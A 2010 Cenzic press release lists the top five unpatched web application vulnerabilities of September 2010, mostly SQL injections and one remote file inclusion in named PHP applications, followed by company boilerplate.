Cenzic Releases Top Five Web Vulnerabilities For September
Web Application Security Continues To Be a Big Issue
Santa Clara, Calif. – October 21, 2010 – Cenzic Inc., the leading provider of Web application security solutions, today released the top five Web application vulnerabilities for the month of September. Cenzic Intelligent Labs (CIA) selected the top five published vulnerabilities based on criticality, availability of a public exploit and lack of an available solution or patch.
“Although there were various critical vulnerabilities reported in Google Chrome as well as a Buffer Overflow vulnerability in Microsoft Internet Information Services (IIS) 7.5, those have been patched,” said Lars Ewe, CTO for Cenzic. “We want to give credit to those organizations who, in spite of having critical vulnerabilities, were able to provide a quick patch. Having critical vulnerabilities out in the wild with public exploits and no known solution is extremely dangerous.”
Top Vulnerabilities
- LightNEasy LightNEasy.php Multiple Parameter SQL Injection
A hole in LightNEasy allows a hacker to carry out an SQL injection attack, due to the 'LightNEasy.php' script not properly sanitizing user-supplied input to the 'handle' parameter and to the 'userhandle' cookie.
- Group-Office modules/notes/json.php category_id Parameter SQL Injection
An attacker has the ability to carry out an SQL injection in Group-Office due to the 'modules/notes/json.php' script not properly sanitizing user-supplied input to the 'category_id' parameter.
- JE FAQ Pro Component for Joomla! index.php catid Parameter SQL Injection
JE FAQ Pro Component for Joomla! contains a vulnerability that allows a hacker to carry out an SQL injection attack due to 'index.php' script not properly sanitizing user-supplied input to the 'catid' parameter.
- ibPhotohost index.php img Parameter SQL Injection
ibPhotohost also contains a flaw that may allow an attacker to carry out an SQL injection attack. Again, the issue is due to the 'index.php' script not properly sanitizing user-supplied input to the 'img' parameter.
- Haudenschilt Family Connections CMS Remote File Inclusion Vulnerability
Multiple PHP remote file inclusion vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 2.2.3 allow remote attackers to execute arbitrary PHP code via a URL in the current_user_id parameter to (1) familynews.php and (2) settings.php.
About Cenzic
Cenzic, a trusted provider of software and SaaS security products, helps organizations secure their websites against hacker attacks. Cenzic focuses on Web Application Security, automating the process of identifying security defects at the Web application level where more than 75 percent of hacker attacks occur. Our dynamic, black box Web application testing is built on a non-signature-based technology that finds more “real” vulnerabilities as well as provides vulnerability management, risk management, and compliance for regulations and industry standards such as PCI. Cenzic solutions help secure the websites of numerous Fortune 1000 companies, all major security companies, leading government agencies and universities, and hundreds of SMB companies -- overall helping to secure trillions of dollars of e-commerce transactions. The Cenzic solution suite fits the needs of companies across all industries, from a cloud solution (Cenzic ClickToSecure Cloud™), to testing remotely via our managed service (Cenzic ClickToSecure® Managed), to a full enterprise software product (Cenzic Hailstorm® Enterprise ARC™) for managing security risks across the entire company.
|
